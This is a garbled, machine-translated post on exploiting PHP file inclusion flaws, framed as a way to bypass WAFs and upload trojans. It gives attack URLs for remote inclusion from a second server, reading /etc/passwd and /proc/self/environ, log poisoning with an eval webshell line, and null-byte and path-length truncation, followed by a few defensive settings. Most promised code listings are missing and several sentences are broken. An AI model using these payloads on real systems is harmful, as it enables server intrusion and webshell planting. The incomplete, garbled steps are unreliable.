Who will burn the smoke and distract it?
The file contains the vulnerability, which is a vulnerabilities used in the penetration test process. It is mainly used to bypass the waf to upload Trojan files. Today, when I was browsing the Tools forum, I found a new type of file containing gestures, sharing it here, and attaching some files containing the basic usage of the vulnerability.
Using the phar:// protocol feature can help us bypass some waf detection during the infiltration process. The phar:// data stream wrapper has been effective since PHP 5.3.0, and it seems to bypass the security dog.
New shell.php code content:
Create a new test.txt content:
Compress the test.txt file, you can rename the compressed file to zip, phar, rar and other formats. After accessing the shell.php file, the phpinfo content will appear.
In the experimental environment, create a new shell.php, test.txt in the test directory, and package test.txt into test.zip.
The contents of shell.php are as follows:
The contents of test.txt are as follows:
The files in PHP contain a function that is divided into local include and remote include, causing the file to contain the following:
Create a new phpinfo.txt, then create a new shell.php and write:
Accessing shell.php will output the contents of the phpinfo page. No matter what the extension is changed to, it will be executed in PHP code. If the file does not conform to the php rules (ie, no <?php?>, etc.), the source code can be directly exported by include.
Prerequisite: You need to enable allow_url_fopen, which is disabled by default.
Create a new php.txt:
Create new index.php:
Visiting http://www.xxxx.com/page=http://www.xxxx.com/php.txt will output hello world.
Such as: http://www.xxx.com/index.php?page=/etc/passwd
The test.txt file can be saved on the remote server as follows:
If the target site has remote inclusion vulnerabilities, you can access it by visiting: http://www.xxx1.com/index.php?page=http://www.xx2.com/test.txt at the server root directory The production of a shell.php content is:
If the target server has the allow_url_fopen turned off, you can try to use the local include + file upload
Upload a picture Trojan a.jpg with the content:
Visit the URL: http://www.xxx.com/index.php?page=./a.jpg to generate shell.php locally.
The apache log is divided into access.log and error.log. When we request a url address, it will be recorded in the access.log, but if we access a page that does not exist, it will be written to the access.log. For example, if you visit the URL: http://www.xxx.com/<?php eval([$_POST]);?>, a sentence will be written to the access.log, but in general, write to A sentence in the access.log file is encoded, so you need to bypass the packet, and you need to know the address of the access.log to exploit this vulnerability, otherwise it will not.
Such as: http://www.test.com/view.php?page=../../../../proc/self/environ
This is the environment variable when the web process is running. Some of the parameters are user-controllable. The most common method is to insert a sentence in the User-Agent.
- data: php5.2 and later versions
- php://input needs to enable allow_url_include
Some developers write code to prevent local inclusion of vulnerabilities:
(a) 00 truncation contains
In this case, for example, uploading a 1.jpg image code, when accessing http://www.xxx.com/1.jpg, the access is 1.jgp.php, thinking that there is no such file, so an error is reported. This is, you can try to visit http://www.xxx.com/1.jpg%00
(two) use long directory truncation
In Windows, the maximum length of the directory is 256 bytes, and under linux is 4096 bytes, and the excess part is discarded.
Open the open_basedir function and set it to the specified directory, only the files in that directory are allowed to be accessed.
Close the allow_url_include function to prevent remote files from being included.
(1) The include directive inserts the source code of “Header.jsp” during conversion, and the
(2) The first two methods can only contain the interface of the current web application, but c:import can contain content outside the container.
Asp seems to be unable to contain remote files (iis security settings), can only contain local files, the syntax is as follows:
The aspx file contains the same syntax as ASP, and the syntax is as follows:
[File upload vulnerability (bypass gesture)] (http://thief.one/2016/09/22/%E4%B8%8A%E4%BC%A0%E6%9C%A8%E9%A9%AC% E5%A7%BF%E5%8A%BF%E6%B1%87%E6%80%BB-%E6%AC%A2%E8%BF%8E%E8%A1%A5%E5%85%85/)